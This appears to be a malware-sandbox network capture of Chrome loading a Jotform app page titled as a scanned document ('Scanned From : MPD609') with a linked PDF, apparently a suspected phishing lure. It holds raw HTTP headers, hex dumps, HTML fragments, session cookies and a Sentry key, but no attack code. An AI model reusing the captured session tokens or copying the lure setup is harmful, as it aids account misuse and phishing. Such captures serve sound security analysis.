                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC275INData Raw: c2 71 1c ac b5 18 63 c8 e5 72 20 04 52 08 82 20 60 38 1c a2 5d d7 c5 4c 26 28 a5 d0 5a 5f 25 be 7e ae c2 30 42 29 85 d2 12 29 5c 8c 31 64 b4 66 32 99 b0 bb 77 97 9b 9f de 24 93 c9 10 27 31 2f 9e bd 60 67 67 07 d7 71 28 57 2a 1c 1d 1d d1 68 d4 b1 d6 d2 ef 9f 50 5c 5d 9d 1d 6b cb db d1 5b b4 ef 7b d3 89 0f 10 0f 01 84 a1 20 0c 43 bc f7 63 ce cf 07 f8 be 47 1c c7 44 51 40 af d7 05 a0 fe 47 9d 7e bf 47 14 06 68 ad 98 18 8f f7 e3 31 13 e3 b3 de 6c 62 49 11 df 7f f7 c3 7f 96 42 21 04 71 1c 4f 4b a7 24 58 58 c9 af 60 8c c1 a6 16 8b 45 20 70 1c 87 d4 a6 28 a5 a6 9a 30 db e9 20 08 10 87 87 c1 47 69 b1 98 c9 a2 9d f5 43 92 24 7f eb a3 e9 5a 0a 88 ab 98 4b 75 94 52 a0 5d d7 f9 98 fc ff 62 99 0f 8a d6 49 32 e7 cb e8 72 0b e7 65 73 ff 1f 58 00 2c 00 16 00 73 07 f8 13
                                                                                                                                                                                                                                            Data Ascii: qcr R `8]L&(Z_%~0B))\1df2w$'1/`ggq(W*hP\]k[{ CcGDQ@G~Gh1lbIB!qOK$XX`E p(0 GiC$ZKuR]bI2resX,s


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            41192.168.2.174974734.107.251.1254435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:03 UTC639OUTGET /jufs/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?md5=e4TDInN6eX2nSpbcjpEIcw&expires=1736510732&width=32&height=32 HTTP/1.1
                                                                                                                                                                                                                                            Host: eu-files.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:03 UTC498INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            access-control-allow-headers: Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization, accept, origin, Cache-Control, X-Requested-With, newrelic, traceparent, tracestate
                                                                                                                                                                                                                                            access-control-allow-methods: OPTIONS, GET
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            cache-control: public,max-age=7200
                                                                                                                                                                                                                                            content-type: image/png
                                                                                                                                                                                                                                            date: Fri, 10 Jan 2025 12:36:03 GMT
                                                                                                                                                                                                                                            Content-Length: 1167
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2025-01-10 12:36:03 UTC892INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 b4 65 58 49 66 49 49 2a 00 08 00 00 00 06 00 12 01 03 00 01 00 00 00 01 00 00 00 1a 01 05 00 01 00 00 00 56 00 00 00 1b 01 05 00 01 00 00 00 5e 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 13 02 03 00 01 00 00 00 01 00 00 00 69 87 04 00 01 00 00 00 66 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 06 00 00 90 07 00 04 00 00 00 30 32 31 30 01 91 07 00 04 00 00 00 01 02 03 00 00 a0 07 00 04 00 00 00 30 31 30 30 01 a0 03 00 01 00 00 00 ff ff 00 00 02 a0 04 00 01 00 00 00 20 00 00 00 03 a0 04 00 01 00 00 00 20 00 00 00 00 00 00 00 91 fe d4 5f 00 00 03 81 49 44 41 54 78
                                                                                                                                                                                                                                            Data Ascii: PNGIHDR szzpHYseXIfII*V^(ifHH02100100 _IDATx
                                                                                                                                                                                                                                            2025-01-10 12:36:03 UTC275INData Raw: c2 71 1c ac b5 18 63 c8 e5 72 20 04 52 08 82 20 60 38 1c a2 5d d7 c5 4c 26 28 a5 d0 5a 5f 25 be 7e ae c2 30 42 29 85 d2 12 29 5c 8c 31 64 b4 66 32 99 b0 bb 77 97 9b 9f de 24 93 c9 10 27 31 2f 9e bd 60 67 67 07 d7 71 28 57 2a 1c 1d 1d d1 68 d4 b1 d6 d2 ef 9f 50 5c 5d 9d 1d 6b cb db d1 5b b4 ef 7b d3 89 0f 10 0f 01 84 a1 20 0c 43 bc f7 63 ce cf 07 f8 be 47 1c c7 44 51 40 af d7 05 a0 fe 47 9d 7e bf 47 14 06 68 ad 98 18 8f f7 e3 31 13 e3 b3 de 6c 62 49 11 df 7f f7 c3 7f 96 42 21 04 71 1c 4f 4b a7 24 58 58 c9 af 60 8c c1 a6 16 8b 45 20 70 1c 87 d4 a6 28 a5 a6 9a 30 db e9 20 08 10 87 87 c1 47 69 b1 98 c9 a2 9d f5 43 92 24 7f eb a3 e9 5a 0a 88 ab 98 4b 75 94 52 a0 5d d7 f9 98 fc ff 62 99 0f 8a d6 49 32 e7 cb e8 72 0b e7 65 73 ff 1f 58 00 2c 00 16 00 73 07 f8 13
                                                                                                                                                                                                                                            Data Ascii: qcr R `8]L&(Z_%~0B))\1df2w$'1/`ggq(W*hP\]k[{ CcGDQ@G~Gh1lbIB!qOK$XX`E p(0 GiC$ZKuR]bI2resX,s


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            42192.168.2.1749754104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:12 UTC906OUTGET /app/250092704521347 HTTP/1.1
                                                                                                                                                                                                                                            Host: eu.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                            Sec-Fetch-User: ?1
                                                                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            If-Modified-Since: Fri, 10 Jan 2025 12:35:55 GMT
                                                                                                                                                                                                                                            2025-01-10 12:36:13 UTC1258INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:13 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:36:13 GMT
                                                                                                                                                                                                                                            jf-trace-id: e37464679398ee80
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.php
                                                                                                                                                                                                                                            expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            Set-Cookie: guest=guest_5a3c5173c0bb4f63; expires=Mon, 10 Feb 2025 12:36:13 GMT; Max-Age=2678400; path=/; domain=.jotform.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            global-router: true
                                                                                                                                                                                                                                            x-raw-uri: /app/:appID
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb61c4df518bc-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:13 UTC111INData Raw: 33 36 62 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22
                                                                                                                                                                                                                                            Data Ascii: 36b2<!doctype html><html lang="en-US"> <head> <meta charset="utf-8"> <meta name="robots" content="
                                                                                                                                                                                                                                            2025-01-10 12:36:13 UTC1369INData Raw: 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 35 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 61 6c 74 65 72 6e 61 74 65 27 20 74 79 70 65 3d 27 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 2b 6f 65 6d 62 65 64 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77
                                                                                                                                                                                                                                            Data Ascii: noindex,nofollow"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=5"> <link rel='alternate' type='application/json+oembed' href='https://www
                                                                                                                                                                                                                                            2025-01-10 12:36:13 UTC1369INData Raw: 63 6f 6e 2d 32 30 32 31 2d 6c 69 67 68 74 2e 70 6e 67 27 3b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6c 69 6e 6b 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 5b 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 5d 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 69 66 20 28 6c 69 6e 6b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 6b 2e 68 72 65 66 20 3d 20 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 6f 74 66 6f 72 2e 6d 73 2f 61 73 73 65 74 73 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 73 2f 27 20 2b 20 69 63 6f 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 75 70 64 61 74 65 46 61 76 69 63 6f 6e 28 77 69 6e 64 6f 77 2e 6d 61 74 63 68 4d 65 64 69 61 28 22 28
                                                                                                                                                                                                                                            Data Ascii: con-2021-light.png'; var link = document.querySelector('[rel="shortcut icon"]'); if (link) { link.href = 'https://cdn.jotfor.ms/assets/img/favicons/' + icon; } } updateFavicon(window.matchMedia("(
                                                                                                                                                                                                                                            2025-01-10 12:36:13 UTC1369INData Raw: 6e 74 65 6e 74 3d 22 4a 6f 74 66 6f 72 6d 20 41 70 70 73 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 75 2e 6a 6f 74 66 6f 72 6d 2e 63 6f 6d 2f 75 70 6c 6f 61 64 73 2f 47 69 74 74 65 6e 73 5f 4d 75 72 72 61 79 2f 66 6f 72 6d 5f 66 69 6c 65 73 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 5f 6d 61 69 6e 50 57 41 49 63 6f 6e 2e 36 37 38 31 30 30 65 31 65 34 33 31 63 2e 70 6e 67 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 73 74 61 72 74 75 70 2d 69 6d 61 67 65 22 20 73 69 7a 65 73 3d 22 32 30 34 38 78 32 37 33 32 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 75 2e 6a 6f 74
                                                                                                                                                                                                                                            Data Ascii: ntent="Jotform Apps"/><link rel="apple-touch-icon" sizes="180x180" href="https://eu.jotform.com/uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png" /><link rel="apple-touch-startup-image" sizes="2048x2732" href="https://eu.jot
                                                                                                                                                                                                                                            2025-01-10 12:36:13 UTC1369INData Raw: 6f 6e 20 20 2d 2d 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 61 70 70 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 6f 6e 22 20 72 65 6c 3d 22 6d 61 6e 69 66 65 73 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 75 73 65 2d 63 72 65 64 65 6e 74 69 61 6c 73 22 20 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 30 32 2e 6a 6f 74 66 6f 72 2e 6d 73 2f 73 2f 76 65 6e 64 6f 72 2f 73 74 61 74 69 63 2f 70 77 61 63 6f 6d 70 61 74 2f 32 2e 30 2e 31 31 2f 70 77 61 63 6f 6d 70 61 74 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 75 2e 6a 6f 74 66 6f 72 6d 2e 63 6f 6d 2f 75 70 6c 6f 61 64 73 2f 47 69
                                                                                                                                                                                                                                            Data Ascii: on --><link href="/app/250092704521347/manifest.json" rel="manifest" crossorigin="use-credentials" /><script src="https://cdn02.jotfor.ms/s/vendor/static/pwacompat/2.0.11/pwacompat.min.js"></script><link rel="icon" href="https://eu.jotform.com/uploads/Gi
                                                                                                                                                                                                                                            2025-01-10 12:36:13 UTC1369INData Raw: 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 6f 74 66 6f 72 2e 6d 73 2f 73 74 79 6c 65 62 75 69 6c 64 65 72 2f 73 74 61 74 69 63 2f 64 6f 6e 61 74 69 6f 6e 42 6f 78 2e 63 73 73 3f 76 3d 33 66 66 39 64 33 65 0a 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 47 4f 4f 47 4c 45 5f 53 49 47 4e 4f 4e 20 3d 20 22 31 37 32 31 32 34 36 33 30 33 37 36 2d 71 6b 31 71 6d 64 66 6d 75 72 32 6f 6a 61 66 33 39 65 30 37 30 69 71 68 70 74 32 66 6f 61 69 70 2e 61 70 70 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22
                                                                                                                                                                                                                                            Data Ascii: rel="stylesheet"> <link rel="stylesheet" type="text/css" href="https://cdn.jotfor.ms/stylebuilder/static/donationBox.css?v=3ff9d3e"> <script> window.GOOGLE_SIGNON = "172124630376-qk1qmdfmur2ojaf39e070iqhpt2foaip.apps.googleusercontent.com"
                                                                                                                                                                                                                                            2025-01-10 12:36:13 UTC1369INData Raw: 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 63 61 6e 6e 65 64 20 46 72 6f 6d 20 3a 20 4d 50 44 36 30 39 5c 6e 22 2c 22 64 69 73 61 62 6c 65 64 41 70 70 54 65 78 74 22 3a 22 54 68 69 73 20 61 70 70 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 22 2c 22 64 69 73 61 62 6c 65 44 61 74 65 22 3a 22 22 2c 22 64 69 73 61 62 6c 65 44 61 74 65 54 69 6d 65 7a 6f 6e 65 22 3a 22 22 2c 22 64 69 73 61 62 6c 65 4f 6e 44 61 74 65 22 3a 22 4e 6f 22 2c 22 69 63 6f 6e 43 6f 6c 6f 72 22 3a 22 23 30 41 31 35 35 31 22 2c 22 69 6e 73 74 61 6c 6c 61 62 6c 65 49 63 6f 6e 55 52 4c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 65 75 2e 6a 6f 74 66 6f 72 6d 2e 63 6f 6d 5c 2f 75 70 6c 6f 61 64 73 5c 2f 47 69 74 74 65 6e 73 5f 4d 75 72 72 61 79 5c 2f 66 6f
                                                                                                                                                                                                                                            Data Ascii: "description":"Scanned From : MPD609\n","disabledAppText":"This app is currently unavailable.","disableDate":"","disableDateTimezone":"","disableOnDate":"No","iconColor":"#0A1551","installableIconURL":"https:\/\/eu.jotform.com\/uploads\/Gittens_Murray\/fo
                                                                                                                                                                                                                                            2025-01-10 12:36:13 UTC1369INData Raw: 36 37 38 31 30 31 31 32 30 36 31 38 62 34 2e 34 31 31 39 32 35 32 39 2e 70 64 66 22 2c 22 69 74 65 6d 42 67 43 6f 6c 6f 72 22 3a 22 23 66 66 66 66 66 66 22 2c 22 69 74 65 6d 42 67 55 52 4c 22 3a 22 22 2c 22 69 74 65 6d 42 6f 72 64 65 72 43 6f 6c 6f 72 22 3a 22 23 44 33 44 43 45 46 22 2c 22 69 74 65 6d 46 6f 6e 74 43 6f 6c 6f 72 22 3a 22 23 30 41 31 35 35 31 22 2c 22 69 74 65 6d 49 63 6f 6e 22 3a 22 22 2c 22 69 74 65 6d 49 63 6f 6e 42 67 43 6f 6c 6f 72 22 3a 22 23 46 46 46 30 22 2c 22 69 74 65 6d 49 63 6f 6e 43 6f 6c 6f 72 22 3a 22 23 64 64 31 36 31 36 22 2c 22 69 74 65 6d 54 65 78 74 41 6c 69 67 6e 6d 65 6e 74 22 3a 22 63 65 6e 74 65 72 22 2c 22 70 61 67 65 22 3a 22 30 22 2c 22 70 6f 72 74 61 6c 4f 72 64 65 72 22 3a 22 31 22 2c 22 73 68 6f 77 49 74 65 6d
                                                                                                                                                                                                                                            Data Ascii: 678101120618b4.41192529.pdf","itemBgColor":"#ffffff","itemBgURL":"","itemBorderColor":"#D3DCEF","itemFontColor":"#0A1551","itemIcon":"","itemIconBgColor":"#FFF0","itemIconColor":"#dd1616","itemTextAlignment":"center","page":"0","portalOrder":"1","showItem
                                                                                                                                                                                                                                            2025-01-10 12:36:13 UTC1369INData Raw: 69 6f 6e 22 3a 22 76 31 22 2c 22 75 74 6d 5f 63 61 6d 70 61 69 67 6e 22 3a 22 65 6f 79 32 30 32 34 22 2c 22 6c 61 75 6e 63 68 41 73 73 65 74 73 41 76 61 69 6c 61 62 6c 65 22 3a 66 61 6c 73 65 2c 22 77 69 6e 64 6f 77 73 54 65 61 6d 4c 61 75 6e 63 68 41 73 73 65 74 73 41 76 61 69 6c 61 62 6c 65 22 3a 66 61 6c 73 65 2c 22 73 61 6c 65 73 66 6f 72 63 65 4c 61 75 6e 63 68 41 73 73 65 74 73 41 76 61 69 6c 61 62 6c 65 22 3a 66 61 6c 73 65 2c 22 73 61 6c 65 73 66 6f 72 63 65 4c 61 75 6e 63 68 41 73 73 65 74 73 41 76 61 69 6c 61 62 6c 65 42 6c 6f 67 22 3a 66 61 6c 73 65 2c 22 77 6f 72 6b 66 6c 6f 77 4c 61 75 6e 63 68 41 73 73 65 74 73 41 76 61 69 6c 61 62 6c 65 22 3a 66 61 6c 73 65 2c 22 61 63 61 64 65 6d 79 4c 61 75 6e 63 68 41 73 73 65 74 73 41 76 61 69 6c 61 62
                                                                                                                                                                                                                                            Data Ascii: ion":"v1","utm_campaign":"eoy2024","launchAssetsAvailable":false,"windowsTeamLaunchAssetsAvailable":false,"salesforceLaunchAssetsAvailable":false,"salesforceLaunchAssetsAvailableBlog":false,"workflowLaunchAssetsAvailable":false,"academyLaunchAssetsAvailab
                                                                                                                                                                                                                                            2025-01-10 12:36:13 UTC1369INData Raw: 50 61 79 6d 65 6e 74 52 65 75 73 61 62 6c 65 46 6f 72 45 6e 74 65 72 70 72 69 73 65 22 3a 66 61 6c 73 65 2c 22 61 69 53 75 70 70 6f 72 74 41 67 65 6e 74 45 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 69 73 4e 65 77 46 6f 6c 64 65 72 53 74 72 75 63 74 75 72 65 41 76 61 69 6c 61 62 6c 65 22 3a 66 61 6c 73 65 2c 22 69 73 4e 65 77 46 6f 72 6d 54 72 61 6e 73 66 65 72 45 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 74 65 61 6d 73 42 65 74 61 55 73 65 72 22 3a 22 30 22 2c 22 61 6c 6c 6f 77 45 6e 63 72 79 70 74 69 6f 6e 56 32 22 3a 74 72 75 65 2c 22 69 73 46 6f 72 6d 42 75 69 6c 64 65 72 4e 65 77 53 68 61 72 65 22 3a 66 61 6c 73 65 2c 22 6f 66 61 63 55 73 65 72 22 3a 66 61 6c 73 65 2c 22 69 73 53 75 70 70 6f 72 74 65 72 73 41 6c 6c 6f 77 65 64 54 6f 4c 6f 67 69
                                                                                                                                                                                                                                            Data Ascii: PaymentReusableForEnterprise":false,"aiSupportAgentEnabled":false,"isNewFolderStructureAvailable":false,"isNewFormTransferEnabled":false,"teamsBetaUser":"0","allowEncryptionV2":true,"isFormBuilderNewShare":false,"ofacUser":false,"isSupportersAllowedToLogi


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            43192.168.2.1749757104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:13 UTC643OUTGET /s/vendor/static/moment/2.29.4/moment-with-locales.min.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn01.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Range: bytes=358478-358478
                                                                                                                                                                                                                                            If-Range: "d458b68730a7330653700489333a7837"
                                                                                                                                                                                                                                            2025-01-10 12:36:13 UTC458INHTTP/1.1 206 Partial Content
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:13 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 12:36:24 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            Age: 105
                                                                                                                                                                                                                                            last-modified: Thu, 12 Dec 2024 12:31:15 GMT
                                                                                                                                                                                                                                            etag: "d458b68730a7330653700489333a7837"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Content-Range: bytes 358478-358478/369019
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6231d7d43e2-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:13 UTC1INData Raw: 78
                                                                                                                                                                                                                                            Data Ascii: x


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            44192.168.2.174975634.120.195.2494435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:13 UTC740OUTPOST /api/5223511/envelope/?sentry_key=36d29a013f8a4bd7adfe310f5fe4d75a&sentry_version=7&sentry_client=sentry.javascript.react%2F8.34.0 HTTP/1.1
                                                                                                                                                                                                                                            Host: o61806.ingest.sentry.io
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Content-Length: 253
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Origin: https://eu.jotform.com
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
